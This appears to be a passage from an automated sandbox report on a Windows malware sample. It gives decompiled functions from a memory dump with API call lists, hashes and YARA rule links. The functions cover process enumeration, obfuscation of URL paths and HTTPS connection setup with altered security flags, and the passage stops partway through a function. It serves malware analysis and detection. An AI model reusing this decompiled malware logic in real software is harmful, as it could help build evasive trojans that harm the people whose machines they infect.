Opcode Fuzzy Hash: f39dedffdec56c54dbeaad8017c6185de75db33348ed9ae2c49fd0dedc755c28
Instruction Fuzzy Hash: 652126B2A417125BC7316E68CC44BFBF3A9EF88754B150BA6F996E7180FF20C8019754

Uniqueness

Uniqueness Score: -1.00%

Function 02BD2107, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E02BD2107(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E02BD3946(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E02BD65EA(_t23);
						}
					}
					return _t38;
				}
				if(E02BD37AC(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x2bdd2e4, 1, 0,  *0x2bdd384);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E02BD24BE(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E02BD282B(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E02BD51BB(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E02BD7CC7( &_v32, _t39);
					goto L13;
				}
			}

0x02bd2107
0x02bd2114
0x02bd211a
0x02bd211b
0x02bd211c
0x02bd211d
0x02bd211e
0x02bd2122
0x02bd212e
0x02bd2132
0x02bd21ba
0x02bd21ba
0x02bd21bd
0x02bd21bf
0x02bd21c7
0x02bd21c7
0x02bd21cd
0x02bd21d0
0x02bd21d0
0x02bd21cd
0x02bd21db
0x02bd21db
0x02bd2145
0x02bd2147
0x02bd2147
0x02bd215e
0x02bd2162
0x02bd2165
0x02bd2170
0x02bd2177
0x02bd2177
0x02bd2180
0x02bd2184
0x02bd2192
0x02bd2186
0x02bd2186
0x02bd2187
0x02bd2188
0x02bd2189
0x02bd218a
0x02bd218b
0x02bd218b
0x02bd2197
0x02bd219a
0x02bd219e
0x02bd21a0
0x02bd21a0
0x02bd21a7
0x00000000
0x02bd21a9
0x02bd21a9
0x02bd21b6
0x00000000
0x02bd21b6

APIs

CreateEventA.KERNEL32(02BDD2E4,00000001,00000000,00000040,00000001,?,74E5F710,00000000,74E5F730,?,?,?,02BD555B,?,00000001,?), ref: 02BD2158
SetEvent.KERNEL32(00000000,?,?,?,02BD555B,?,00000001,?,00000002,?,?,02BD53C9,?), ref: 02BD2165
Sleep.KERNEL32(00000BB8,?,?,?,02BD555B,?,00000001,?,00000002,?,?,02BD53C9,?), ref: 02BD2170
CloseHandle.KERNEL32(00000000,?,?,?,02BD555B,?,00000001,?,00000002,?,?,02BD53C9,?), ref: 02BD2177

Part of subcall function 02BD24BE: WaitForSingleObject.KERNEL32(00000000,?,?,?,02BD2197,?,02BD2197,?,?,?,?,?,02BD2197,?), ref: 02BD2598

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: d56676d39839bc10ef1287df68b3b8d4733853ff402638060355a619645a71b6
Instruction ID: 000f39bdbf84d192a5da2abc9e242d81a6242e8d855823c2299cd8f410d912b2
Opcode Fuzzy Hash: d56676d39839bc10ef1287df68b3b8d4733853ff402638060355a619645a71b6
Instruction Fuzzy Hash: CA21C273D00259ABCB20AFE4C8849DEB7BEEF48354B0184A5EF15E3101F7349985CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02BD22D2, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E02BD22D2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E02BD75F6(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x02bd22de
0x02bd22e2
0x02bd22e3
0x02bd22e4
0x02bd22e6
0x02bd22e8
0x02bd22eb
0x02bd22f0
0x02bd2387
0x02bd238e
0x02bd238e
0x02bd22f9
0x02bd2300
0x02bd2310
0x02bd2310
0x02bd2316
0x02bd2318
0x02bd231d
0x02bd2326
0x02bd232c
0x02bd2331
0x02bd233c
0x02bd2340
0x02bd2342
0x02bd2343
0x02bd234c
0x02bd2350
0x02bd2361
0x02bd2352
0x02bd2357
0x02bd235c
0x02bd236b
0x02bd236b
0x02bd2340
0x02bd2371
0x02bd2377
0x02bd2377
0x02bd2380
0x02bd2385
0x02bd2385
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 02BD2300
lstrlenW.KERNEL32(?), ref: 02BD2336
memcpy.NTDLL(00000000,?,?,?), ref: 02BD2357
SysFreeString.OLEAUT32(?), ref: 02BD236B

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: cab37282a43abb5217b918d04945d4efe21ea9cb1ace92343aaa9feba20d0755
Instruction ID: 970e7bfc168104a27abeec63282911ac05bf672ef136b3f559dade7bb107808f
Opcode Fuzzy Hash: cab37282a43abb5217b918d04945d4efe21ea9cb1ace92343aaa9feba20d0755
Instruction Fuzzy Hash: CB21597990124AEFCB11DFA8C984ADEBBB9FF49255B1081A9EC41E7201FB30DA00CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02BD26DD, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02BD26DD(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x2bdd270, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x2bdd288; // 0x0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x2bdd288 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x02bd26e5
0x02bd26e8
0x02bd26ee
0x02bd2706
0x02bd2708
0x02bd270d
0x02bd270f
0x02bd2712
0x02bd2714
0x02bd2717
0x02bd2719
0x02bd2719
0x02bd271b
0x02bd2726
0x02bd272b
0x02bd273c
0x02bd2744
0x02bd2749
0x02bd274c
0x02bd274f
0x02bd2751
0x02bd2754
0x02bd2757
0x02bd2757
0x02bd275a
0x02bd2765
0x02bd276a
0x02bd2774

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02BD1A07,00000000,?,?,02BD4653,?,067495B0), ref: 02BD26E8
RtlAllocateHeap.NTDLL(00000000,?), ref: 02BD2700
memcpy.NTDLL(00000000,?,-00000008,?,?,?,02BD1A07,00000000,?,?,02BD4653,?,067495B0), ref: 02BD2744
memcpy.NTDLL(00000001,?,00000001), ref: 02BD2765

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: d453d52e2c3b4abd6509ac98cd7a642ad7c87db7eeb5e4ad012419abd7d8b45a
Instruction ID: 8f15bf7b97010a1b9ed9141ff07fc5fbe8b0c98d370137d4a22c10bb4fc86731
Opcode Fuzzy Hash: d453d52e2c3b4abd6509ac98cd7a642ad7c87db7eeb5e4ad012419abd7d8b45a
Instruction Fuzzy Hash: 2D110672A00215BFC714CA69DC84EDABFAEDB802A1B0502B6F544D7140F7709E049760

Uniqueness

Uniqueness Score: -1.00%

Function 02BD5AB2, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E02BD5AB2(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E02BD1A9C(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x2bdd2e0; // 0x3b6a5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x2bde4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x2bde8f0; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E02BD34C7();
					_push( &_v64);
					if( *0x2bdd0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E02BD34C7();
				}
				return _t28;
			}

0x02bd5ab2
0x02bd5ab9
0x02bd5ac7
0x02bd5acb
0x02bd5ad5
0x02bd5ada
0x02bd5adf
0x02bd5ae4
0x02bd5aee
0x02bd5af8
0x02bd5af8
0x02bd5af0
0x02bd5af0
0x02bd5af0
0x02bd5af0
0x02bd5afe
0x02bd5b04
0x02bd5b05
0x02bd5b08
0x02bd5b0b
0x02bd5b0e
0x02bd5b16
0x02bd5b1f
0x02bd5b27
0x02bd5b27
0x02bd5b29
0x02bd5b2b
0x02bd5b2b
0x02bd5b35

APIs

Part of subcall function 02BD1A9C: SysAllocString.OLEAUT32(00000000), ref: 02BD1AF6
Part of subcall function 02BD1A9C: SysAllocString.OLEAUT32(0070006F), ref: 02BD1B0A
Part of subcall function 02BD1A9C: SysAllocString.OLEAUT32(00000000), ref: 02BD1B1C

memset.NTDLL ref: 02BD5AD5
GetLastError.KERNEL32 ref: 02BD5B21

Strings

@MtNt, xrefs: 02BD5B21
<, xrefs: 02BD5AE4

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocString$ErrorLastmemset
String ID: <$@MtNt
API String ID: 3736384471-2823972799
Opcode ID: 57440dc9e11b939aca8f84a71a099f4a078a4f4155eb4f4171740690d306ff2e
Instruction ID: b1c772200d2fb4459aaafeb6aa52cdef6c5cff731cd9924dee1f26f9ccdb848d
Opcode Fuzzy Hash: 57440dc9e11b939aca8f84a71a099f4a078a4f4155eb4f4171740690d306ff2e
Instruction Fuzzy Hash: C5012D71D01228ABDB21EFA4D884EDE7BA8AF08784F854466F918EB140F774D9058FA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BD4A03, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02BD4A03() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x2bdd2e0; // 0x3b6a5a8
						_t2 = _t9 + 0x2bdee3c; // 0x73617661
						_push( &_v264);
						if( *0x2bdd110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x02bd4a0e
0x02bd4a18
0x02bd4a1c
0x02bd4a26
0x02bd4a57
0x02bd4a2d
0x02bd4a32
0x02bd4a3f
0x02bd4a48
0x02bd4a5f
0x02bd4a4a
0x02bd4a52
0x00000000
0x02bd4a52
0x02bd4a60
0x02bd4a61
0x00000000
0x02bd4a61
0x00000000
0x02bd4a5b
0x02bd4a67
0x02bd4a6c

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02BD4A13
Process32First.KERNEL32(00000000,?), ref: 02BD4A26
Process32Next.KERNEL32(00000000,?), ref: 02BD4A52
CloseHandle.KERNEL32(00000000), ref: 02BD4A61

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: edbb066f54a2cdd5c2f274bb1c432c05df169056226f464418dacbf322a67cb0
Instruction ID: ea6c08560796eb1d02a3bd4eb60cf67ac009fe090d6bda2a47328aacf8395d68
Opcode Fuzzy Hash: edbb066f54a2cdd5c2f274bb1c432c05df169056226f464418dacbf322a67cb0
Instruction Fuzzy Hash: 5FF024329411686BCB20A736CC08EEB36BCDBC5354F0001E2E96AC3000FB30DA95CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 02BD4450, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD4450() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x2bdd2a4; // 0x330
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x2bdd2f4; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x2bdd2a4; // 0x330
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x2bdd270; // 0x6350000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x02bd4450
0x02bd4457
0x02bd44a1
0x02bd44a3
0x02bd44a3
0x02bd445b
0x02bd4461
0x02bd4466
0x02bd446a
0x02bd4470
0x02bd4477
0x00000000
0x00000000
0x02bd4479
0x02bd447e
0x00000000
0x00000000
0x00000000
0x02bd447e
0x02bd4480
0x02bd4488
0x02bd448b
0x02bd448b
0x02bd4491
0x02bd4498
0x02bd449b
0x02bd449b
0x00000000

APIs

SetEvent.KERNEL32(00000330,00000001,02BD191C), ref: 02BD445B
SleepEx.KERNEL32(00000064,00000001), ref: 02BD446A
CloseHandle.KERNEL32(00000330), ref: 02BD448B
HeapDestroy.KERNEL32(06350000), ref: 02BD449B

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: abeda769790ae78665c8fe42dc4ebad7d402ef052d9dec8ee5f64d64278fa0f1
Instruction ID: 1fe498c54709fa9c8745745e0af9d04aee4d67e738c665f960fb59fbf69eaa7b
Opcode Fuzzy Hash: abeda769790ae78665c8fe42dc4ebad7d402ef052d9dec8ee5f64d64278fa0f1
Instruction Fuzzy Hash: 26F01C72F823139BDB205B35E958BC63AACEB047E5B090A50B884D7180FF30E494CA64

Uniqueness

Uniqueness Score: -1.00%

Function 02BD7749, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E02BD7749(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _t34;
				long _t36;
				unsigned int _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t45;
				void* _t56;
				intOrPtr _t57;
				void* _t63;
				intOrPtr* _t65;
				intOrPtr* _t66;
				void* _t69;

				_t66 = __esi;
				_t63 = E02BD1922(_t34, _a4);
				if(_t63 == 0) {
					L18:
					_t36 = GetLastError();
				} else {
					_t37 = GetVersion();
					_t69 = _t37 - 6;
					if(_t69 > 0) {
						L5:
						_a4 = 4;
					} else {
						if(_t69 != 0) {
							L4:
							_a4 = 0;
						} else {
							_t37 = _t37 >> 8;
							if(_t37 > 2) {
								goto L5;
							} else {
								goto L4;
							}
						}
					}
					__imp__(_t63, _a4, 0, 0, 0);
					 *(_t66 + 0x10) = _t37;
					_t38 = E02BD4AAB(_t63);
					if( *(_t66 + 0x10) == 0) {
						goto L18;
					} else {
						_t39 = E02BD1922(_t38,  *_t66);
						_v8 = _t39;
						if(_t39 == 0) {
							goto L18;
						} else {
							_t65 = __imp__; // 0x6fb0f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
								_t40 = E02BD4AAB(_v8);
								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x800100;
									_t56 = E02BD1922(_t40,  *((intOrPtr*)(_t66 + 4)));
									if(_t56 == 0) {
										goto L18;
									} else {
										_t42 =  *0x2bdd2e0; // 0x3b6a5a8
										_t19 = _t42 + 0x2bde758; // 0x450047
										_t43 = _t19;
										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4);
										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
										E02BD4AAB(_t56);
										_t45 =  *((intOrPtr*)(_t66 + 0x18));
										if(_t45 == 0) {
											goto L18;
										} else {
											_t57 = 4;
											_v12 = _t57;
											__imp__(_t45, 0x1f,  &_a4,  &_v12);
											if(_t45 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
											}
											_push(_t57);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t66 + 0x18)));
											if( *_t65() == 0) {
												goto L18;
											} else {
												_push(_t57);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t66 + 0x18)));
												if( *_t65() == 0) {
													goto L18;
												} else {
													_t36 = 0;
												}
											}
										}
									}
								}
							} else {
								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
								if(_t39 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t36;
			}

0x02bd7749
0x02bd7758
0x02bd775e
0x02bd788f
0x02bd788f
0x02bd7764
0x02bd7764
0x02bd776a
0x02bd776c
0x02bd777c
0x02bd777c
0x02bd776e
0x02bd776e
0x02bd7777
0x02bd7777
0x02bd7770
0x02bd7770
0x02bd7775
0x00000000
0x00000000
0x00000000
0x00000000
0x02bd7775
0x02bd776e
0x02bd778a
0x02bd7791
0x02bd7794
0x02bd779c
0x00000000
0x02bd77a2
0x02bd77a4
0x02bd77a9
0x02bd77ae
0x00000000
0x02bd77b4
0x02bd77b4
0x02bd77bd
0x02bd77d4
0x02bd77e0
0x02bd77e9
0x02bd77ec
0x02bd77f4
0x00000000
0x02bd77fa
0x02bd77fd
0x02bd7809
0x02bd780f
0x00000000
0x02bd7811
0x02bd7814
0x02bd781d
0x02bd781d
0x02bd7827
0x02bd782e
0x02bd7831
0x02bd7836
0x02bd783b
0x00000000
0x02bd783d
0x02bd783f
0x02bd784b
0x02bd784e
0x02bd7856
0x02bd7858
0x02bd7869
0x02bd7869
0x02bd786b
0x02bd786f
0x02bd7870
0x02bd7872
0x02bd7879
0x00000000
0x02bd787b
0x02bd787b
0x02bd787f
0x02bd7880
0x02bd7882
0x02bd7889
0x00000000
0x02bd788b
0x02bd788b
0x02bd788b
0x02bd7889
0x02bd7879
0x02bd783b
0x02bd780f
0x02bd77bf
0x02bd77ca
0x02bd77ce
0x00000000
0x00000000
0x00000000
0x00000000
0x02bd77ce
0x02bd77bd
0x02bd77ae
0x02bd779c
0x02bd7898

APIs

Part of subcall function 02BD1922: lstrlen.KERNEL32(?,00000000,06749B10,00000000,02BD74FF,06749CEE,?,?,?,?,?,69B25F44,00000005,02BDD00C), ref: 02BD1929
Part of subcall function 02BD1922: mbstowcs.NTDLL ref: 02BD1952
Part of subcall function 02BD1922: memset.NTDLL ref: 02BD1964

GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,02BD544C,00000000,00000000,06749618,?,?,02BD2A8A,?,06749618,0000EA60), ref: 02BD7764
GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,02BD544C,00000000,00000000,06749618,?,?,02BD2A8A,?,06749618,0000EA60), ref: 02BD788F

Strings

@MtNt, xrefs: 02BD788F

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastVersionlstrlenmbstowcsmemset
String ID: @MtNt
API String ID: 4097109750-3251738875
Opcode ID: d0ec28786f5736250a8afffe10b3053e1bffd885c856372b324a1a374a4f791e
Instruction ID: 016f88f4feae052542965ee438f68844546360c9497758ad32f03af782b20109
Opcode Fuzzy Hash: d0ec28786f5736250a8afffe10b3053e1bffd885c856372b324a1a374a4f791e
Instruction Fuzzy Hash: 24418371550204BFDB359FA5DC85EFABBBDEB04384F00496AF64296050FB71E944EB60

Uniqueness

Uniqueness Score: -1.00%

Function 02BD117A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD117A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E02BD1922(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0;
					_t22 = E02BD9371(__ecx, _a4, _a8, _t25);
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E02BD4A6D(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x2bdd270, 0, _t25);
				}
				return _t22;
			}

0x02bd117a
0x02bd118b
0x02bd118f
0x02bd11ea
0x02bd1191
0x02bd1198
0x02bd11a0
0x02bd11a8
0x02bd11ac
0x02bd11b2
0x02bd11ba
0x02bd11bd
0x02bd11d5
0x02bd11d5
0x02bd11e0
0x02bd11e0
0x02bd11f1

APIs

Part of subcall function 02BD1922: lstrlen.KERNEL32(?,00000000,06749B10,00000000,02BD74FF,06749CEE,?,?,?,?,?,69B25F44,00000005,02BDD00C), ref: 02BD1929
Part of subcall function 02BD1922: mbstowcs.NTDLL ref: 02BD1952
Part of subcall function 02BD1922: memset.NTDLL ref: 02BD1964

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,06749364), ref: 02BD11B2
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,06749364), ref: 02BD11E0

Strings

Ut, xrefs: 02BD11E0

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Ut
API String ID: 1500278894-8415677
Opcode ID: ebefb30a4e085c7bbaad06ffde8993f9ade39eac17a0aeb62ea683dd8f0f1523
Instruction ID: d65285c7ca3c56a9a132b20cc1095682a9e6f547486deed2659512b0ee5da8de
Opcode Fuzzy Hash: ebefb30a4e085c7bbaad06ffde8993f9ade39eac17a0aeb62ea683dd8f0f1523
Instruction Fuzzy Hash: CF01BC3621020ABBDB215FA8DC44FDA7F79EF84754F40442AFA44DA060EA71C964CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02BD27C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02BD27C7(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t9;
				signed int _t11;
				intOrPtr _t12;
				struct HINSTANCE__* _t14;
				intOrPtr _t17;
				intOrPtr _t20;

				_t9 =  *0x2bdd2d8;
				_v8 = _v8 & 0x00000000;
				_t20 =  *0x2bdd28c; // 0x334
				if(_t9 != 0) {
					L2:
					if(_t20 != 0) {
						_t11 =  *_t9(_t20,  &_v8);
						if(_t11 == 0) {
							_v8 = _v8 & _t11;
						}
					}
					L5:
					return _v8;
				}
				_t12 =  *0x2bdd2e0; // 0x3b6a5a8
				_t3 = _t12 + 0x2bde0af; // 0x4e52454b
				_t14 = GetModuleHandleA(_t3);
				_t17 =  *0x2bdd2e0; // 0x3b6a5a8
